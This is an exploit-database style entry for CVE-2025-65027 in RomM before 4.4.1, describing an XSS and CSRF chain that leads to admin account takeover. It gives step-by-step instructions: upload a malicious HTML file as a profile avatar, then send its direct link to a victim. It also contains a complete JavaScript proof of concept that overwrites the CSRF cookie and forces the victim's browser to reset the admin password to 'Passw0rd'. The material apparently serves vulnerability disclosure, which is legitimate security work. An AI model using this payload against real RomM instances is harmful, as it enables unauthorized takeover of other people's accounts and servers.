📄 RomM Cross Site Scripting / File Upload

# Exploit Title: RomM < 4.4.1 -  XSS_CSRF Chain
    # Date: 2025-12-03
    # Exploit Author: He4am (https://github.com/mHe4am)
    # Vendor Homepage: https://romm.app/
    # Software Link: https://github.com/rommapp/romm (Docker: https://hub.docker.com/r/rommapp/romm)
    # Version: < 4.4.1
    # Tested on: Linux
    # CVE: CVE-2025-65027
    
    # -------------------
    
    # Vulnerability: Chaining unrestricted file upload (XSS) + CSRF token reuse to bypass SameSite protection
    # Impact: Admin account takeover
    
    # Prerequisites:
    # 1. Attacker needs an authenticated account (Viewer role is sufficient)
    # 2. Victim must visit the uploaded malicious HTML file via a direct link
    
    # Steps to reproduce:
    # 1. Login to RomM
    # 2. Obtain your CSRF token:
    #    - Open browser DevTools > Application tab (or Storage on Firefox) > Cookies
    #    - Copy the `romm_csrftoken` cookie value
    # 3. Replace <ATTACKER_CSRF_TOKEN> below with your token
    # 4. Replace <TARGET_ROMM_URL> with the target RomM instance URL (e.g., http://romm.local)
    # 5. Save this file as `avatar.html`
    # 6. Upload it as your profile avatar (http://romm.local/user/me) and click the Apply button
    # 7. Locate the uploaded file's direct link:
    #    - DevTools > Network tab > Filter for `.html` files
    #    - Or capture it via proxy (e.g., Burp Suite)
    #    - It's usually something like: "http://romm.local/assets/romm/assets/users/<Random-ID>/profile/avatar.html"
    # 8. Send this direct link of the uploaded avatar/file to the victim
    # 9. When victim (e.g. admin) opens the link, their password will be changed to "Passw0rd"
    
    # -------------------
    
    # PoC Code:
    <script>
    const csrfToken = "<ATTACKER_CSRF_TOKEN>";		// CHANGE THIS - Your CSRF token from step 2
    const targetURL = "<TARGET_ROMM_URL>";			// CHANGE THIS - Target RomM URL (e.g., http://romm.local)
    const targetUserID = 1;							// Default admin ID is always 1, CHANGE THIS if needed
    const newPassword = "Passw0rd";					// Password to set for victim
    
    // Overwrite CSRF cookie to match our token
    document.cookie = `romm_csrftoken=${csrfToken}; path=/`;
    
    // Execute account takeover by forcing the victim to change their password
    fetch(targetURL + "/api/users/" + targetUserID, {
      method: 'PUT',
      credentials: 'include',  // Send victim's session cookie
      headers: {
       'Content-Type': 'application/x-www-form-urlencoded',
       'x-csrftoken': csrfToken
      },
      body: "password=" + newPassword
    })
    .then(() => {
      console.log("Password changed successfully");
    })
    .catch(err => {
      console.error("Attack failed:", err);
    });
    </script>
    
    # -------------------
    
    # See full writeup for technical details: https://he4am.medium.com/bypassing-samesite-protection-chaining-xss-and-csrf-for-admin-ato-in-romm-44d910c54403